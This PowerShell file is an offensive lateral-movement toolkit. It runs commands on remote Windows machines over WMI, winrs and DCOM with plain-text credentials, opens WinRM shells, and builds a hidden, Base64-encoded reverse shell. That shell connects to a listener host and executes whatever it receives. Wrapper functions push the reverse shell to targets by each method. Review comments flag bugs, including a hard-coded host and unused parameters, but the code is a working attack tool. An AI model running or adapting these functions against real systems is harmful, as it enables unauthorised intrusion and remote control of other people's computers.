<#
.SYNOPSIS
Executes a command remotely on a Windows machine using CIM/WMI.
.DESCRIPTION
Wraps the plain-text password in a PSCredential, opens a CIM session to
TargetComputer using the DCOM protocol, and calls the Win32_Process Create
method with Command as the CommandLine argument. The CIM session is never
removed, so it remains open for the lifetime of the calling PowerShell
process.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username. It is accepted as a plain [string]
rather than a SecureString or PSCredential.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.OUTPUTS
Whatever Invoke-CimMethod returns for Win32_Process.Create. No ReturnValue
check is performed here, so the caller has to inspect the result.
.EXAMPLE
Invoke-RemoteCommandWMI -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteCommandWMI {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputer
)
# -Force is required to build a SecureString from plain text; the plain copy
# still lives in $Password for the rest of this call.
$secureString = ConvertTo-SecureString $Password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential ($Username, $secureString);
# DCOM transport instead of the default WSMan transport.
$options = New-CimSessionOption -Protocol DCOM;
$session = New-CimSession -ComputerName $TargetComputer -Credential $credential -SessionOption $options;
# Win32_Process.Create starts Command as a new process on the target.
$result = Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command };
# NOTE(review): $session is never passed to Remove-CimSession.
return $result;
}
<#
.SYNOPSIS
Executes a command remotely using Windows Remote Management (winrs).
.DESCRIPTION
Invokes the external winrs.exe with the supplied username, password and
command. NOTE(review): the remote host is hard-coded as files04 and the
TargetComputer parameter is never referenced, so every call goes to files04
regardless of the value passed. The password is placed on the winrs.exe
command line via -p:.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username. Accepted as a plain [string].
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address. Declared but currently unused
(see DESCRIPTION).
.OUTPUTS
Whatever winrs writes to standard output, emitted as pipeline output.
.EXAMPLE
Invoke-RemoteCommandWinRM -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteCommandWinRM {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputer
)
# -r: is hard-coded; $TargetComputer is ignored on this line.
winrs -r:files04 -u:$Username -p:$Password $Command
}
<#
.SYNOPSIS
Opens a remote shell on the target machine.
.DESCRIPTION
Builds a PSCredential from the plain-text password, creates a PSSession to
TargetComputerName over HTTPS (-UseSSL), and enters it interactively with
Enter-PSSession. The Command parameter is declared but never used, and the
PSSession is never removed.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username. Accepted as a plain [string].
.PARAMETER Command
Declared with a default of whoami but not referenced anywhere in the body.
.PARAMETER TargetComputerName
The target computer's hostname or IP
.EXAMPLE
Invoke-WinRMShell -Username 'admin' -Password 'Password123' -TargetComputerName fileserv
.NOTES
NOTE: Not working at the moment but seems correct per documentation.
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-WinRMShell {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputerName
)
# -Force is required to build a SecureString from plain text.
$secureString = ConvertTo-SecureString $Password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential ($Username, $secureString);
# -UseSSL selects the HTTPS WinRM listener on the target.
$pssession = New-PSSession -UseSSL -ComputerName $TargetComputerName -Credential $credential
# NOTE(review): the session Id is passed positionally; the author reports this
# does not work. Left unchanged.
Enter-PSSession $pssession.Id
}
<#
.SYNOPSIS
Generates a powershell reverse shell command string.
.DESCRIPTION
Concatenates a fixed PowerShell one-liner that opens a TcpClient to
RshellHost:RshellPort, reads from the stream in a loop, runs each received
chunk through iex, and writes the output followed by a "PS <cwd>> " prompt
back to the stream. The one-liner is UTF-16LE ("Unicode") encoded and
Base64-wrapped, which is the form that powershell's -e (-EncodedCommand)
argument expects. Nothing here hides the payload: Base64-decoding the -e
argument yields exactly the text assembled below.
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener. Concatenated into the string, so the
[int] is coerced to its decimal text.
.OUTPUTS
A string of the form "powershell -nop -w hidden -e <base64>".
.EXAMPLE
Get-ReverseShellCMD -RshellHost 192.0.2.42 -RshellPort 443
.NOTES
Defensive note: the returned command line, and the payload recoverable from
its -e argument, is what process-creation logging on the target records when
the Invoke-RemoteShell* wrappers in this file run it.
Author: David Cheeseman
Created: 2025-05-10
#>
function Get-ReverseShellCMD {
param (
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
# Single-quoted fragments, so only $RshellHost and $RshellPort are expanded
# here; every other $ is literal text of the remote one-liner.
$payload = '$client = New-Object System.Net.Sockets.TCPClient("' +
$RshellHost + '",' + $RshellPort + ');' +
'$stream = $client.GetStream();' +
'[byte[]]$bytes = 0..65535|%{0};' +
'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){' +
'$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);' +
'$sendback = (iex $data 2>&1 | Out-String );' +
'$sendback2 = $sendback + "PS " + (pwd).Path + "> ";' +
'$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);' +
'$stream.Write($sendbyte,0,$sendbyte.Length);' +
'$stream.Flush()};' +
'$client.Close()'
# UTF-16LE bytes, then Base64: the encoding -EncodedCommand requires.
$bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
$encoded = [Convert]::ToBase64String($bytes)
$cmd = "powershell -nop -w hidden -e $encoded"
return $cmd
}
<#
.SYNOPSIS
Launches a reverse shell attack against a remote host.
.DESCRIPTION
Builds the encoded reverse-shell command line with Get-ReverseShellCMD and
hands it to Invoke-RemoteCommandWMI as the Command to run on TargetComputer.
There is no Command parameter on this function; the command is always the
generated one.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username. Accepted as a plain [string].
.PARAMETER TargetComputer
The target computer's name or IP address
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener.
.OUTPUTS
The uncaptured output of Invoke-RemoteCommandWMI, followed by the value of
$result (see the review note in the body).
.EXAMPLE
Invoke-RemoteShellWMI -RshellHost '192.0.2.42' -RshellPort 443 -Username 'admin' -Password 'Password123' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteShellWMI {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$true)]
[string]$TargetComputer,
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
$cmd = Get-ReverseShellCMD -RshellHost $RshellHost -RshellPort $RshellPort
# The return value of this call is not captured, so it flows to the pipeline as-is.
Invoke-RemoteCommandWMI -Username $Username -Password $Password -Command $cmd -TargetComputer $TargetComputer
# NOTE(review): $result is never assigned in this function, so this emits
# $null (or an enclosing scope's $result, if one exists) after the output above.
return $result;
}
<#
.SYNOPSIS
Launches a reverse shell attack against a remote host.
.DESCRIPTION
Builds the encoded reverse-shell command line with Get-ReverseShellCMD and
hands it to Invoke-RemoteCommandWinRM as the Command to run. There is no
Command parameter on this function; the command is always the generated one.
NOTE(review): Invoke-RemoteCommandWinRM ignores its TargetComputer argument
(its winrs call hard-codes the host), so the value passed here is not used.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username. Accepted as a plain [string].
.PARAMETER TargetComputer
The target computer's name or IP address
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener.
.OUTPUTS
The uncaptured output of Invoke-RemoteCommandWinRM, followed by the value of
$result (see the review note in the body).
.EXAMPLE
Invoke-RemoteShellWinRM -RshellHost '192.0.2.42' -RshellPort 443 -Username 'admin' -Password 'Password123' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteShellWinRM {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$true)]
[string]$TargetComputer,
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
$cmd = Get-ReverseShellCMD -RshellHost $RshellHost -RshellPort $RshellPort
# The return value of this call is not captured, so it flows to the pipeline as-is.
Invoke-RemoteCommandWinRM -Username $Username -Password $Password -TargetComputer $TargetComputer -Command $cmd
# NOTE(review): $result is never assigned in this function, so this emits
# $null (or an enclosing scope's $result, if one exists) after the output above.
return $result;
}
<#
.SYNOPSIS
Executes a command remotely using DCOM functionality.
.DESCRIPTION
Instantiates the MMC20.Application COM class on TargetComputer through DCOM
and calls Document.ActiveView.ExecuteShellCommand to start powershell with
Command as its parameters. This function takes no credentials, so the remote
activation presumably runs under the caller's current security context
(verify against the environment). The COM object is never released.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.OUTPUTS
Whatever ExecuteShellCommand returns; it is not captured or checked here.
.EXAMPLE
Invoke-RemoteCommandDCOM -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteCommandDCOM {
param (
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputer
)
# Remote activation: GetTypeFromProgID with a server name resolves the class on TargetComputer.
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1",$TargetComputer))
# Arguments are (Command, Directory, Parameters, WindowState); the executable
# is fixed to "powershell" and $Command is passed as its parameter string.
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,$Command,"7")
}
<#
.SYNOPSIS
Launches a reverse shell attack against a remote host.
.DESCRIPTION
Builds the encoded reverse-shell command line with Get-ReverseShellCMD and
hands it to Invoke-RemoteCommandDCOM as the Command to run on TargetComputer.
There is no Command, Username or Password parameter on this function: the
command is always the generated one, and the DCOM path takes no credentials.
.PARAMETER TargetComputer
The target computer's name or IP address
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener.
.OUTPUTS
The uncaptured output of Invoke-RemoteCommandDCOM.
.EXAMPLE
Invoke-RemoteShellDCOM -RshellHost '192.0.2.42' -RshellPort 443 -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteShellDCOM {
param (
[Parameter(Mandatory=$true)]
[string]$TargetComputer,
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
$cmd = Get-ReverseShellCMD -RshellHost $RshellHost -RshellPort $RshellPort
# Output is not captured; whatever Invoke-RemoteCommandDCOM emits is this function's output.
Invoke-RemoteCommandDCOM -TargetComputer $TargetComputer -Command $cmd
}